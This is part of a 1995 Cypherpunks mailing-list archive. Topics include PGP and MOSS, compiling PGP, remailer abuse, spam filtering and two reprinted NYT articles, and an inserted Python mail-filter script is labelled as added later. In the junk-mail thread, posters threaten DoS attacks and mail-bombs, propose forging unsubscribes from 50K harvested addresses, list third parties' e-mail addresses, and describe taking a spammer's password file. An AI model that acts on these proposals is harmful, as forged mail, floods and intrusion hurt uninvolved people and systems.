> a security mechanism change.  Worse, MOSS uses X.509, which requires a
> lot of overhead for certificates.

Ah, I was hoping that my statement would stir some controversy. I've 
learned that well thought out, carefully reasoned posts never get any 
response.

I agree with you that the X.509 stuff is extra baggage in MOSS. 
Fortunately, the use of X.509 is optional.

MOSS has two very large advantages over PGP:

1. It can operate without temp files.

2. It has no non-MIME variant.

It will take forever for PGP/MIME to catch on. Thus, PGP will never 
really be a suitable candidate for my generic interface. Ah well.

> On the other hand, the MIME-PGP protocol can provide the same
> integration functionality as MOSS and still allow the use of the
> simple PGP certification structure that already exists.

This is true. I hope it happens.

> -derek
> 

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 21 Nov 1995 01:18:21 +0800
To: cypherpunks@toad.com
Subject: Micropayments article?
Message-ID: <Pine.3.89.9511191738.A5801-0100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


Would someone please send me a pointer to the micropayment article?


TIA,








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 21 Nov 1995 00:38:14 +0800
To: Lucky Green <cypherpunks@toad.com
Subject: Re: Micropayments article?
Message-ID: <acd526a100021004703d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:46 AM 11/20/95, Lucky Green wrote:
>Would someone please send me a pointer to the micropayment article?

http://theory.lcs.mit.edu/~rivest/

I am copying the list because, perhaps counterintuitively, it will save
bandwidth and overall effort. The reasons are left as an exercise in game
theory for the student.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 20 Nov 1995 08:11:17 +0800
To: cypherpunks@toad.com
Subject: "Junk E-Mail"
Message-ID: <199511192347.SAA06834@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Is anyone else getting lots of junk e-mail lately? I'm getting all
kinds of direct marketing crap to both of my main accounts and I haven't
posted to usenet in months. I pretty much only post to cypherpunks, and
that is rarely. And I never put my real email address on web sites that
ask for them. I fear I am on some kind of direct marketing e-mail
"list". I've warned the perpetrators that if I get another ad from
them, they better expect a denial-of-service attack from me on their
site and lots of mail-bombs.


sick of the clutter,
-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@TeleCheck.com>
Date: Mon, 20 Nov 1995 11:10:01 +0800
To: cypherpunks@toad.com
Subject: Re: Recompiling PGP262i under microsoft.
Message-ID: <9511200255.AA03117@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text



For those that might benefit, I have included some notes I have gained 
through my wanderings through PGPland, towards an easy PGP-mail program 
for Windows.  Below I have included sketchy details on compiling PGP 
as an MS-DOS app, WIN16 DLL, and Win32 DLL. 
 
I won't be able to provide specific details, until I recover data from 
my backup tapes (I had a nasty drive failure, and have been lethargic in 
recovering).  I finally get my IBM PC/RT configured for TCP/IP and my PC 
explodes. :<. 
 
If anything here is wrong, or fuzzy, feel free to post corrections, 
etc., as this is all from my alcohol soaked, nicotine riddled brain. 
 
Compiling PGP under MSVC 1.5 & 2.x 
========= === ===== ==== === = === 
 
To compile PGP under MSVC 1.5 (I believe there is a supplied Microsoft C 
make file that was written for Quick C) you will need to create a 
project and add the files necessary.  Be sure to include the already 
compiled RSAREF.LIB in the project files. 
 
Unfortunately, there is one very annoying problem with Microsoft Visual 
C, in which it will regenerate the dependencies from the source code 
files without preprocessing the #ifdefs.  You will have to edit the make 
file and take out all of the UNIX sys/whatever stuff. 
 
I believe this is the biggest hurdle, but you might try using the Quick 
C make file, although I don't think it will work without modification 
(Microsoft seems disenchanted with compatibility, even between revisions 
of their own software). 
 
You may also have some trouble with type conversion, but I think it's 
intuitive to overcome that. (it's been a while...).  If anyone knows of
an easier way to do this, I will be more than happy to listen. 
 
Compiling RSAREF as a DLL under MSVC 
========= ====== == = === ===== ==== 
 
This is easy, but you may have trouble with the dependencies again.  The 
most important thing is to create a .DEF file and put all of the export 
declarations in there.  Unless you plan on rewriting PGP to load the DLL 
dynamically, simply link against it to save a few headaches (remember 
you still need a .DEF file or you will get unresolved errors!). 
 
Compiling PGP as a Windows DLL 
========= === == = ======= === 
 
I was able to find someone in Australia (sorry, the name eludes me at 
the moment) who managed to port PGP to a Windows DLL, under Borland C.  
I only installed Borland C++ 4.0 today, so much of my work/play has been 
targeted towards Microsoft Visual C++ 1.5/2.0 under NT (besides I was 
waiting on PGP3.0). 
 
If anyone wants these files (for Borland) I will send them out when I 
recover them (hopefully).  It includes modifications to no more than 
three files, and includes both reentrant and non-reentrant entry points.  
I also have the mail program (MAPI) that this guy wrote in executable 
form.  He was very careful about the Australian equivalent of the ITAR, 
so he would only send the modified files, which I will pass on for those 
who are interested. 
 
If you want to do the same thing under MSVC, the same changes apply. 

Hope that helps some. 

-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Mon, 20 Nov 1995 20:57:44 +0800
To: Greg Broiles <remailer-operators@c2.org
Subject: Re: remailer abuse
Message-ID: <199511200524.VAA00445@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:27 PM 11/19/95 -0800, Greg Broiles wrote:
>...
> If A wants to send
>messages to B, but B doesn't want to receive them, should A be forced to
>stop sending?

My rambling $.02:

I haven't thought all this through, but I have an emerging stance. Just this
week I've started ploughing through the Cyphernomicon, and was smacked in
the face with the eminently pragmatic Mr. May's statement that any law that
cannot be enforced should not exist. 

Up until, say, this week, I'd always been in favor of Caller ID. I'd figured
if anyone wants to call me, I have the right to know who it is. By default,
I had adopted this position concerning email. Now, one day I will receive an
anonymous email. Will I be offended? Maybe. Can I do anything about it? Not
likely. Anonymous communication is only going to get easier. Current
congressional prattling notwithstanding, the onus of responsibility will
have to shift to the recipient. For example, I could configure my mail
program to automatically throw away any incoming message with "anonymous" in
the "From" header. (Or any message from *@pseudo.goldenbear.com, for that
matter) 

If junk mail continues to bother people, it's only a matter of time until
mail programs' filtering capabilities become much more sophisticated. (Of
course, for all I know, there already ARE programs that do what I'm about to
propose.) People can maintain a "do not accept from" list, containing every
anonymous remailer they've ever heard about, or an "accept only from" list,
containing just the people they wish to converse with. I think it's this
second option that will become increasingly important. Sure it's your right
to send me whatever the hell you like, just as it's my right to ignore you
completely. Bringing this back to my hobby-horse of Caller ID, you end up
with even greater protection than an unlisted number--let the whole world
know my number--no one'll get through unless I already know him. And then in
the brave unregulated future, if you make a new friend, you merely swipe his
public-key business card through your PDA, which adds it to your "accept
calls and emails from" list.

And to take a stab at another pair of Greg's questions, if A is sending
messages from his account on X's system to B, and B doesn't want to receive
them, should B have the right to make X stop A? No. (Not that I think the
law is going to realize that any time soon.) Should X have the right to stop
A? Hell yes--it's his system. Let A find a more open-minded ISP if he
doesn't like it.

Corey Bridges
Security Scribe
Netscape Communications Corporation
415-528-2978
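
The two filtering policies described in the message above ("do not accept from" and "accept only from"), as an added example that is not part of the original post. The sample messages, the example.org/example.net addresses and the function names are constructed for illustration; only the pseudo.goldenbear.com pattern and the "anonymous" keyword come from the thread.

```python
import fnmatch
from email import message_from_string
from email.utils import parseaddr

# Policy data. The keyword and the domain pattern are the two rules named in
# the message; the allow-list entry is a constructed placeholder.
DENY_KEYWORD = "anonymous"
DENY_PATTERNS = ["*@pseudo.goldenbear.com"]
ALLOW_ADDRESSES = {"friend@example.org"}

# Constructed sample messages (not real traffic).
SAMPLES = {
    "anon": "From: Anonymous Sender <an12345@pseudo.goldenbear.com>\n"
            "Subject: hello\n\nbody\n",
    "pseudonym": "From: Frank Jones <fjones@pseudo.goldenbear.com>\n"
                 "Subject: hello\n\nbody\n",
    "friend": "From: A Friend <Friend@Example.ORG>\n"
              "Subject: lunch\n\nbody\n",
    "stranger": "From: Some Stranger <stranger@example.net>\n"
                "Subject: offer\n\nbody\n",
    "two_from": "From: friend@example.org\n"
                "From: stranger@example.net\n"
                "Subject: odd\n\nbody\n",
}


def extract_sender(raw_message):
    """Return (raw From header, lowercased address), or (header, None).

    A message with no From header, more than one From header, or a From
    value that does not parse to a single addr-spec has no usable sender.
    """
    msg = message_from_string(raw_message)
    values = msg.get_all("From") or []
    if len(values) != 1:
        return None, None
    header = str(values[0])
    _name, addr = parseaddr(header)
    if addr.count("@") != 1:
        return header, None
    return header, addr.lower()


def classify(raw_message, mode):
    """Apply one of the two policies; return (verdict, reason).

    mode "deny-list":  accept unless a deny rule matches.
    mode "allow-list": discard unless the sender is explicitly listed.
    """
    if mode not in ("deny-list", "allow-list"):
        raise ValueError("unknown mode: " + mode)

    header, addr = extract_sender(raw_message)
    if addr is None:
        return ("discard", "missing or malformed From header")

    if mode == "allow-list":
        if addr in ALLOW_ADDRESSES:
            return ("accept", "sender on accept-only-from list")
        return ("discard", "sender not on accept-only-from list")

    # Deny-list mode: keyword rule first, then address patterns.
    if DENY_KEYWORD in header.lower():
        return ("discard", "keyword 'anonymous' in From header")
    for pattern in DENY_PATTERNS:
        if fnmatch.fnmatchcase(addr, pattern.lower()):
            return ("discard", "address matches " + pattern)
    return ("accept", "no deny rule matched")


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        for mode in ("deny-list", "allow-list"):
            print(name, mode, classify(raw, mode))
```

The "pseudonym" sample passes the keyword rule and is caught only by the domain pattern, which is the case the pseudonymous-remailer idea earlier in the thread relies on. Both lists key on the From header, which the sender controls, so they sort mail rather than authenticate it.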





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 20 Nov 1995 20:54:17 +0800
To: Ray Cromwell <rjc@clark.net>
Subject: Re: "Junk E-Mail"
In-Reply-To: <199511192347.SAA06834@clark.net>
Message-ID: <Pine.ULT.3.91.951119213257.14590D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 19 Nov 1995, Ray Cromwell wrote:

>   Is anyone else getting lots of junk e-mail lately? I'm getting all
> kinds of direct marketing crap to both of my main accounts and I haven't
> posted to usenet in months. I pretty much only post to cypherpunks, and
> that is rarely. And I never put my real email address on web sites that
> ask for them. I fear I am on some kind of direct marketing e-mail
> "list". I've warned the perpetrators that if I get another ad from
> them, they better expect a denial-of-service attack from me on their
> site and lots of mail-bombs.

I have been told that this is off-topic, but yes. And same conclusion here
that someone is passing around an old list. So far, most of the junk email
I've received is addressed to jabba@deathstar, an account I haven't used
for three years. Most of the other folks around here get junk mail
addressed to username@jessica or @mordor, when in fact we all moved to
@networking a year ago. 

I happen to have a little over 50K addresses used by the valleynet.net
spammer. I don't see your address on the list, but there are 86 other
clark.net addresses, and these: 

rjc@bayvax.decus.org
rjc@mhc.edu
rjc@netpoint.net
rjc@plaza.ds.adp.com
rjc@wells.haystack.edu
rjcd85a@prodigy.com
rjconn@freenet.calgary.ab.ca
rjcook@ns.cencom.net
rjcron@most.magec.com
rjcsys@cpcug.org

I propose a surgical strike mailbomb response -- forge unsubscribes and
complaints to postmaster from every one of these 50K addresses I have. I 
know they've been spammed before; they'd probably agree. To what 
addresses should I send these unsubscribes?

The list of spammed addresses is yours if you can verify who you are and
tell me what you're going to do with it. 

A malicious attack might be justifiable in extreme cases. For example, 
because of some really, really stupid Web and mail server design flaws, 
it would have been trivial for me to have erased the entire hard drives of all 
of the machines at valleynet.net. But I figured picking up his password 
file and telling all of his customers what I thought of him would be 
almost as effective while retaining the moral high ground.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 20 Nov 1995 21:00:33 +0800
To: Corey Bridges <remailer-operators@c2.org
Subject: Paid Delivery (was Re: remailer abuse)
Message-ID: <acd55af301021004bafc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:21 AM 11/20/95, Corey Bridges wrote:
>At 05:27 PM 11/19/95 -0800, Greg Broiles wrote:
>>...
>> If A wants to send
>>messages to B, but B doesn't want to receive them, should A be forced to
>>stop sending?
>
>My rambling $.02:
>
>I haven't thought all this through, but I have an emerging stance. Just this
>week I've started ploughing through the Cyphernomicon, and was smacked in
>the face with the eminently pragmatic Mr. May's statement that any law that
>cannot be enforced should not exist.

Thanks. It's always heartening to see that someone is affected positively
by one's arguments.

>Up until, say, this week, I'd always been in favor of Caller ID. I'd figured
>if anyone wants to call me, I have the right to know who it is. By default,
>I had adopted this position concerning email. Now, one day I will receive an
>anonymous email. Will I be offended? Maybe. Can I do anything about it? Not
>likely. Anonymous communication is only going to get easier. Current

Yes, anonymous communication is getting easier, and the costs of trying to
stop it are becoming impossibly high. It would essentially require a police
state to stop, and even then it probably couldn't be stopped...for example,
I could always set up a "Tim's Quoting Service," which passes on anonymous
mail to a recipient with the "Hey, someone says this..." Could I be
prosecuted? Not even in a police state. Just one of dozens of approaches to
skirt such laws.

However, anticipating your next point, this does not mean anonymous
communication bandwidth will become infinite. Solutions are predictable.
See below.

>congressional prattling notwithstanding, the onus of responsibility will
>have to shift to the recipient. For example, I could configure my mail
>program to automatically throw away any incoming message with "anonymous" in
>the "From" header. (Or any message from *@pseudo.goldenbear.com, for that
>matter)
>
>If junk mail continues to bother people, it's only a matter of time until
>mail programs' filtering capabilities become much more sophisticated. (Of
>course, for all I know, there already ARE programs that do what I'm about to
>propose.) People can maintain a "do not accept from" list, containing every
>anonymous remailer they've ever heard about, or an "accept only from" list,

Many of us do this all the time. The Macintosh (and Windows) mail program I
currently use is "Eudora Pro," from Qualcomm. Extensive filtering options.
Certainly it is possible to set up filters to put mail from "anonymous"
into mailboxes, or the trash. And just as possible, though a bit more
involved, to put mail from _desired_ sources into boxes, or have a priority
flag raised, etc.

What if one is "bombarded" by mail, thousands of messages a day, or many
megabytes?

There are two main options, besides meaningless clamoring for legislation
against "junk mail":

1. Some services, like Prodigy, allow one to discard a message before
reading it, with no charge. (Seeing the sender and message name only.) This
does not solve the problem completely, but it certainly eliminates cost to
the enduser. The service provider still has the mail, but at least his
network connections are likely to not be much affected....still possible to
bring the service to its knees, which brings up the second approach....:

2. Sender pays the costs of transmission. That is, if someone wishes to
send 10 megabytes to a site, at least _he_ (or _she_) pays the freight.
This is of course the way things now work with the U.S. postal system, with
"Postage Due" no longer common: if the sender doesn't

In the real world, nothing is really free, so the whole economics of the
Internet has been deceiving for quite some time. The notion that one can
"spam" for free, shipping megabytes to thousands of sites, has led to
strange notions about the economics of the Net and, as a result, to calls
for new laws about "unwanted e-mail," "spamming," etc.

Of course, most users on the Net are now paying for connectivity one way or
another. Even U.C. Berkeley, one of the pioneers in Unix and campus
connections to the Net, has subcontracted out its Net connections to
Netcom, with students and faculty paying around $15 a month. A sign of the
times. (There are also reasons why at least so far it has proven viable to
_not_ charge for individual transmissions. Various kinds of subsidies.)

Filtering is a solution for the reader not to have to see stuff he doesn't
want to see, but he or his ISP may still receive the stuff, even if it gets
discarded, which is why the long term solution is likely to involve paid
deliveries.

(Needless to say, this is not currently part of the Net, and I'm not
suggesting it will happen anytime soon, or because I happen to think it's a
solution. Rather, what I'm saying is that it's a _technological_ and
_market_ solution to the "problem" of spammage and "unwanted mail filling
up our mailboxes." How it happens is unclear. But think of how markets
generally evolve to deal with what would naively be seen as unsolvable
crises or shortages. Long before we all are getting gigabytes of unwanted
stuff every day, alternatives will develop. I am confident that paid
delivery is one of the keys.)


>And to take a stab at another pair of Greg's questions, if A is sending
>messages from his account on X's system to B, and B doesn't want to receive
>them, should B have the right to make X stop A? No. (Not that I think the
>law is going to realize that any time soon.) Should X have the right to stop
>A? Hell yes--it's his system. Let A find a more open-minded ISP if he
>doesn't like it.

Amen. Exactly.


>Corey Bridges
>Security Scribe
>Netscape Communications Corporation
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Interesting. And now I'm even happier to have partly made a convert.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Tue, 21 Nov 1995 00:06:33 +0800
To: remailer-operators@c2.org
Subject: Re: remailer abuse
In-Reply-To: <199511200127.AA17430@ideath.goldenbear.com>
Message-ID: <Pine.A32.3.91.951119225404.61842A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 19 Nov 1995, Greg Broiles wrote:

> I think adopting a submissive or apologetic stance with respect to the 
> operation of a remailer is a mistake. What we do is protected by the First
> amendment, supports a 200+ year tradition of anonymous political speech in
> America, provides a valuable service to a worldwide community, and can help
> avoid the very abuse they are accused of facilitating. The child who was the

[extremely lucid comments clipped to save bandwidth]

Agreed, wholeheartedly. The above paragraph would be a perfect candidate 
for wide dissemination across the net. 

The facts are that to eliminate the "abusive" mail would require 
crippling the remailer system to an unacceptable degree. Therefore we as 
operators are in a position of being forced to either tolerate messages 
that we may disagree (strongly) with, shut down the remailers, or resort 
to inadequate 40bit encryption and pseudo-anonymous Penet.fi remailing.
(no offense to Julf intended..)

I see nothing submissive or apologetic about pointing this fact out in a 
focused and organised way. In fact, making this fact plain might actually 
limit the number of people using the remailers to harass other users. If 
general opinion is that remailer operators accept and condone /all/ 
forms of communication, without regard for its potential effects, why 
shouldn't the spammer take advantage of our generosity?

Certainly being PC should not be the primary consideration in any 
undertaking, but the United States (and other nations) have well paid and 
well organised spin doctors working to convince the public that 
cryptographers and remail operators are "bad" people whose only purpose 
is to aid pedophiles and other criminals in carrying out their dastardly 
deeds. Ignoring the political implications of operating a remailer is 
simply foolish. Public opinion is going to be an important consideration 
when the laws come to the table. Sure, we could move the remailers off 
shore, but why do that unless we have to? The idea of being a 
"cryptorebel", or an underground warrior for peace and privacy is 
certainly romantic, but I'd like to think that it doesn't have to be that way.

Then again, I didn't need propaganda to convince me that I needed privacy. 
Maybe I'm just strange..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 20 Nov 1995 15:59:11 +0800
To: cypherpunks@toad.com
Subject: Re: remailer abuse
Message-ID: <199511200747.XAA09583@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 22:43 11/19/95 -0800, Timothy C. May wrote:
>Yes, anonymous communication is getting easier, and the costs of trying to
>stop it are becoming impossibly high. It would essentially require a police
>state to stop, and even then it probably couldn't be stopped...

Considering that there are well known ways of spoofing IP addresses, if you
really want to, you can be anyone.  (They must be well known.  I know at
least one. <grin>)


>2. Sender pays the costs of transmission. That is, if someone wishes to
>send 10 megabytes to a site, at least _he_ (or _she_) pays the freight.
>This is of course the way things now work with the U.S. postal system, with
>"Postage Due" no longer common...

I think we lack direct charges for network traffic because detailed
accounting for use of each net-link is too expensive.  The situation is
similar to that of the telephone system in the 1950s, where the switches
which connected local calls did not have enough smarts to do charging, and
so started the tradition of "free" local calls.

When lots of people start sending full motion video over the net we may see
ISPs develop use based charging schemes.  I should add that one of the
reasons I use Netcom is that they do NOT charge for connect time or network
traffic.  There is a market for known, fixed costs too.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 21 Nov 1995 04:07:29 +0800
To: cypherpunks@toad.com
Subject: [NON-LIST] Re: reputations: discussions and meta-discussions
Message-ID: <199511200819.AAA22823@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


(This really should be in private mail; keyid D072FC19 (still unnamed) 
can reach me using anon.penet.fi or alpha.c2.org or a reply-block
remailer to get replies....   Or if you prefer, send me one-way remail
and I'll post replies in alt.anonymous.messages.)

At 02:17 AM 11/19/95 -0800, - keyid D072FC19 (still unnamed) wrote:

>On Sat, 18 Nov 1995, Bill Stewart wrote: 
>> Here's the new entity's key, signed :-)  I haven't added it to the
>> PGP key servers; I'll leave that up to you...
>
>As we know, a public key certificate is a binding between the key and
>some attribute, as asserted by the signer.  In this case you have asserted
>a binding between my key and the string "a new entity, as yet unnamed".
>I don't understand why you did this.  Would you please explain?
>The only reason I can think of is that you wanted to provide evidence
>for the key's creation date by timestamping it.  If that was the case,
>I thank you.  But in the future, to avoid confusion, perhaps you can 
>create a new ID "timestamp" for the key and sign that instead.

Are you asking why I used the string "a new entity, as yet unnamed",
or why I certified it?  If the former, it's because when I loaded the
PGP key block into my public key file, that's who it said it was,
and it matched the name in your cypherpunks posting.

If you're asking why I certified a key used by a nym, I started doing that
a couple months ago, as an experiment about what it means to certify keys
and how to provide better continuity for keys used by nyms, and signing
yours seemed like an appropriate thing to do (since you chose to name
your key as belonging to the same string you signed your message with.)
I have the policy of only signing one key for a given namestring with the key
I use for signing nyms, so it gives a certain evidence of uniqueness as well as 
the timestamping effect.

Since you also commented on cluttering up namespace, I didn't send the key
to the keyserver myself; that's up to you.

Has it been a wildly successful experiment?  Well, no :-)  But I've at least
had to think about some of the issues more, and a couple of people have gotten
their nym keys signed.





#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 20 Nov 1995 21:41:42 +0800
To: cypherpunks@toad.com
Subject: Re: WRITTEN CODE
Message-ID: <199511201316.FAA09442@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> Curious, where is uncg.edu? Your French name doesn't make me think you're 
> in the States (as an .edu address might suggest, but then not necessarily 
> either). (univ of Calgary?)

I think the University of Calgary is actually in the .ca domain. 

It's a Canadian address.  It's just like your very own domain.  Your
machine tesla is on uottawa.ca.  Your University of Ottawa address is not
in .edu, but is in .ca. 

It's interesting though, that you brought up Calgary.

Calgary, as I assume our Ottawa poster knows, was very busy over the last
week.  Grand Central station.  All of the politicos seemed to transit the
city. 

Reform Party Leader, Preston Manning, and Conservative Party Leader, Jean
Charest, held duelling fund-raising dinners this last Wednesday in
Calgary.  And Canada's ambassador to the United States, the Prime
Minister's nephew -- Raymond Chretien -- left Washington and spoke to the
Calgary Chamber of Commerce about NAFTA on Friday. 

Chretien was particularly troubled by remarks from Senate Majority Leader
Bob Dole, about wanting to re-open Chapter 19 in the NAFTA.  Following his
Chamber of Commerce address, Chretien was quoted as saying, "For us,
Chapter 19 is the heart of NAFTA.  And this dispute mechanism has been put
in there to take into account the fact that we are a much smaller economy,
a much smaller country.  We have to rely on those tri-national panels to
defend our interests." 

Chretien for now is chalking up the threatening comments to political 
posturing in the run-up to the presidential election next year, otherwise 
he said, "we will have a serious problem."

Chretien also played down security concerns after a knife-wielding
intruder broke into his uncle's (the Prime Minister's) home at 24 Sussex. 
Despite living in Washington, D.C., Chretien said he doesn't fear for his
public safety.  

When he was asked about the lack of visible protection during his visit to
Calgary, he said: "I'm just a humble public servant." 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 20 Nov 1995 12:56:15 +0800
To: cypherpunks@toad.com
Subject: Ponzi Web
Message-ID: <199511200430.FAA02552@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NY Times, 11-20-95, front page.

If Medium Is the Message, the Message Is the Web

By John Markoff

San Francisco, Nov. 19 -- The Associated Press was formed in
the mid-19th century when a group of newspapers decided to
invest jointly in a newfangled medium -- the telegraph -- to
speed the collection and dissemination of information.

Last week, A.P. announced that it would adopt a newer-fangled
medium -- the World Wide Web -- to begin distributing its
articles and photographs over the global Internet. It was
simply the latest, but perhaps most historically significant,
move yet by an old-line media organization into the World Wide
Web, the Internet multimedia information-retrieval system that
appears on the verge of becoming a mass medium itself.

If the medium is the message, then the message these days is
the World Wide Web.

In short order the Web, which three years ago was little more
than a research tool for physicists and computer hobbyists,
has flourished. It is being embraced by media concerns,
consumer-product companies and businesses of various stripes
that are creating thousands of so-called Web sites each month,
with the number of computers playing host to one or more of
these sites already exceeding 100,000.

Conservative estimates place the number of people who have
used the Web in the millions, and it is not hard to find more
breathless estimates in the tens of millions.

Capable of letting people use computers to send and receive
text, sound, still images and video clips, the Web
incorporates elements of the various print and electronic
media that have preceded it. And yet, the Web is poised not to
replace its predecessors but to take a place alongside them as
a social, cultural and economic force in its own right.

Its complementary role is already evident: many radio stations
and all the major television networks have Web sites promoting
their programs and stars. Newspapers, including The New York
Times, are devising cyberspace editions.

And few movies anymore are released without a promotional Web
site, including "Goldeneye" the James Bond film that opened
this weekend at theaters everywhere and on the Web at the
address http://www.mgmua.com/bond. The site offers the movie's
theme song performed by Tina Turner, more than a dozen video
clips from the film and illustrated biographies of the cast
members.

Prime-time television commercials by Toyota and other
advertisers now routinely include a Web address. And Procter
& Gamble, whose advertising has long helped underwrite the
mass media, has even staked out prime Web real estate by
reserving addresses that include flu.com and toiletpaper.com.

"We are poised on the edge of a new medium," Clay Felker,
director of the magazine program at the University of
California at Berkeley's graduate journalism school, said.
"It's going to change the nature of how we acquire
information."

As with each mass medium that has arrived before it, the Web
has reached this threshold through a confluence of a key
technology, a ready audience and a stream of corporate backers
willing to bet that profitable businesses can be built on it.
But few experts are willing to declare that the Web has taken
its place in the mass media pantheon because the profitable
business formulas have yet to be found.

Newspapers and magazines make money by selling individual
copies, subscriptions and advertising space. Radio and
television stations sell air time to those with money and a
message. Movie theaters sell tickets. But on the Web so far,
despite seed-money by adventurous advertisers and some
tentative efforts to charge for access to sites or services,
there is no certainty that this medium will achieve the
critical mass that capitalism demands of its mass media.

"How do you make a business out of the World Wide Web?" asked
Norman Pearlstine, editor in chief of Time Inc., which has an
experimental Web site called Pathfinder that offers selected
contents from the company's magazines
(http://www.pathfinder.com). But because ad revenue alone is
not carrying the freight, Time Inc. will begin testing ways to
charge visitors to its site.

And yet, the technological prerequisites are firmly in place.
The Web is an outgrowth of the Internet, which began as an
academic research experiment in the late 1960's. For more than
two decades the Internet remained largely inaccessible, used
mainly by computer scientists and Pentagon researchers,
university scholars and students.

Then came the World Wide Web.

Like the Internet, the Web began as a tool to let scientists
easily and quickly share information. Conceived in the late
1980's by Tim Berners-Lee, who was then a software designer at
CERN, the Swiss physics research center, the basic Web
technology was first put to use in 1990.

The big breakthrough came in 1992, when student researchers at
the National Center for Supercomputing Applications in
Illinois created Mosaic, a simple software tool called a Web
browser. Mosaic permitted access to information anywhere on
the World Wide Web by letting the user point and click a
computer mouse on highlighted words or images on the screen.
The browser, which became available in commercial versions
like Netscape Communications' Navigator, not only made Web
sites easily accessible, it prompted businesses, organizations
and even individuals to create new Web sites by the thousands.

Thus did the Web quickly become a standard and accepted way
for the growing millions of the computer-literate to
communicate and to entertain and inform themselves. And unlike
each previous mass medium, the Web does not require its
audience to be merely passive recipients of information.

For very little money, and with a modicum of computer skills,
virtually anyone can create his or her own Web site. Anyone
with a modem is potentially a global pamphleteer.

One consequence of this democratization is that the Web can be
a remarkably anarchic forum compared with the old-style mass
media. "Think of this as television colliding with the
telephone party line," said Paul Saffo, a computer industry
consultant at the Institute for the Future, a Menlo Park,
Calif., research firm. "In terms of social consequences, the
Web is a great experiment. It's going to deliver us community
with a vengeance -- and we may find we don't want it."

-----

NYT, 11-20-95, Business Section.

Losses From Computer Breaches Are on the Rise, a Study Finds

By Peter H. Lewis

Financial losses from computer break-ins and other security
breaches are on the rise, according to a survey of corporate
computer-security managers, with nearly half of all companies
reporting losses as a result of hackers, viruses, sabotage,
corporate spies and incompetent employees.

At least 20 of the 1,290 companies responding to the annual
security survey from Information Week magazine and the
consulting firm Ernst & Young, reported losses of more than $1
million last year.

But the poll also found that companies were more aware of the
risks arising from growing reliance on computer networks, and
were taking stronger steps to protect their information
systems.

"There is definitely increased awareness on the part of senior
management," said Daniel White, national director of
information security at Ernst & Young's Chicago office. But
Mr. White said that despite increased vigilance by computer
security officers, the lack of security tools made it risky to
conduct electronic-document interchange and other sensitive
business operations on the Internet.

"Lots of organizations are using the Internet in a thoughtful
way for marketing and information dissemination," Mr. White
said. "But do I really want to use it" for an
electronic-document transaction? "Not yet."

Details of the survey, the third annual one, are in the Nov.
28 issue of Information Week, available this week.

Among other findings were that nearly 80 percent of companies
surveyed had at least one full-time information-security
officer, a slight increase from last year. Of those, 45
percent report directly to the corporation's chief information
officer, reflecting the growing recognition of the importance
of computer security, Mr. White said.

Nearly 70 percent of those responding said their companies had
sustained a serious virus attack in the last year, a sharp
rise from 54 percent two years ago.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
